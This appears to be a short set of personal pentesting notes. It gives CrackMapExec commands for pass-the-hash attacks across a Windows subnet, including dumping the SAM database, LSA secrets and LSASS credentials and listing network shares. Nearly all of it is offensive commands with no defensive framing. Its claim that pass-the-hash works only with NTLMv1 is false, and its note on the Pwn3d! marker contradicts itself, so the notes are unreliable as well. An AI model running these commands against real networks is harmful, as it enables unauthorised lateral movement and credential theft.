If we have obtained hash of some user, this leads into the capability to do a pass the hash attack.

<aside> ⚠️ PASS THE HASH WORK ONLY WITH NTLMv1 ! ! !

</aside>

CrackMapExec

crackmapexec smb <subnet>/<subnet mask> -u <user> -H <LM:NT> --local-auth

Untitled

<aside> ⚠️ The text Pwn3d! means that these credentials are associated to a local admin account on the specified machine! In this example on the HYDRA-DC we're able to login as admin, because we have the [+] icon but we're NOT a local admin.

</aside>

Dump SAM database:

crackmapexec smb <subnet>/<subnet mask> -u <user> -H <LM:NT> --local-auth --sam

List all shares in the network:

crackmapexec smb <subnet>/<subnet mask> -u <user> -H <LM:NT> --local-auth --shares

Dump LSASS passwords:

crackmapexec smb <subnet>/<subnet mask> -u <user> -H <LM:NT> --local-auth --lsa

List all the modules compatible with SMB protocol:

crackmapexec smb -L

Lsassy

crackmapexec smb <subnet>/<subnet mask> -u <user> -H <LM:NT> --local-auth -M lsassy